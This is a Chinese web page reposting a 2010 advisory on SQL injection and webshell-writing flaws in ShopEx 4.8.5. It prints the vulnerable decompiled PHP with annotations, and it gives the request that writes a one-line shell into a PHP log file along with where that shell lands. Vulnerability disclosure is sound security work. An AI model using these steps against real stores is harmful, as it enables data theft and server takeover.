shopex 4.8.5.45144注入和远程shell写入漏洞漏洞预警 -电脑资料

电脑资料时间：2019-01-01 我要投稿

【www.unjs.com - 电脑资料】

ShopEx网上商店平台软件系统又称网店管理系统、网店程序、网上购物系统、在线购物系统，

shopex 4.8.5.45144注入和远程shell写入漏洞漏洞预警

。

一：shopex 4.8.5.45144 \core\include_v5\shopCore.php 注入漏洞

\core\include_v5\shopCore.php

01 public function shopCore( )

02 {

03 parent::kernel( );

04 if ( isset( $_POST['spgdif'] ) )

05 {

06 $this->spgdif( ); //进入函数

07 exit( );

08 }

09 ............................

10 }

11 public function spgdif( )

12 {

13 include_once( CORE_DIR."/func_ext.php" );

14 if ( $_POST['session'] && $_POST['query'] && $_POST['sign'] ) //没任何过滤

15 {

16 if ( md5( $_POST['query'].$_POST['session']."shopex_stats" ) == $_POST['sign'] ) //MD5 验证，我们可以自己控制。

17 {

18 $cert = $this->loadModel( "service/certificate" );

19 if ( $data = $cert->session_vaild( $_POST['session'] ) )

20 {

21 $this->fetchdata( $_POST['query'] );

22 }

23 ..........................

24 public function fetchdata( $params )

25 {

26 $params = unserialize( $params );

27 $sql = "SELECT ";

28 foreach ( $params['fields'] as $key => $value )

29 {

30 $sql .= $value['method']."(".$value['name'].")";

31 if ( $value['alias'] )

32 {

33 $sql .= " as ".$value['alias']; //代入sql

34 }

35 $sql .= ",";

36 }

37 $sql = substr( $sql, 0, -1 );

38 $sql .= " FROM ".$params['tbl']." ";

39 ...............

40 $db = $this->database( );

41 ob_start( );

42 $data = $db->select( $sql );

43 ob_end_clean( );

44 if ( $data )

45 {

46 echo json_encode( array(

47 "res" => "succ",

48 "data" => $data //没任何干扰，全部显示出来！（人品好了点，

电脑资料

《shopex 4.8.5.45144注入和远程shell写入漏洞漏洞预警》(https://www.unjs.com)。）

49 ) );

50 }

51 else

52 {

53 echo json_encode( array(

54 "res" => "fail",

55 "data" => $sql

56 ) );

57 }

58 }

利用代码exp：

exploit.htm

-----

shopex 4.8.5 SQL Injection Vulnerability 0day ”2010.06.12

By：qing

QQ：33089632

二：shopex 4.8.5.45144 \core\include_v5\crontab.php 远程shell写入漏洞

\core\include_v5\crontab.php （zend加密后的，我只发布解密后的代码）

01 public function run( )

02 {

03 $this->logFile = HOME_DIR."/logs/access.log.php";

04 $this->now = time( );

05 $this->viewStat( );

06 $messenger =& $this->loadModel( "system/messenger" );

07 $messenger->runQueue( );

08 }

10 public function viewStat( )

11 {

12 if ( !file_exists( $this->logFile ) )

13 {

14 file_put_contents( $this->logFile, "#\n" ); //囧之处！

15 }

16 if ( isset( $_GET['action'] ) )

17 {

18 error_log( $this->now."\t".$_GET['action']."\t".$_GET['p']."\n", 3, $this->logFile );//没有任何过滤，

利用：

直接提交：http://127.0.0.1/shopex/?cron=1&action=1&p=1

一句话在：http://127.0.0.1/shopex/home/logs/access.log.php

相关文章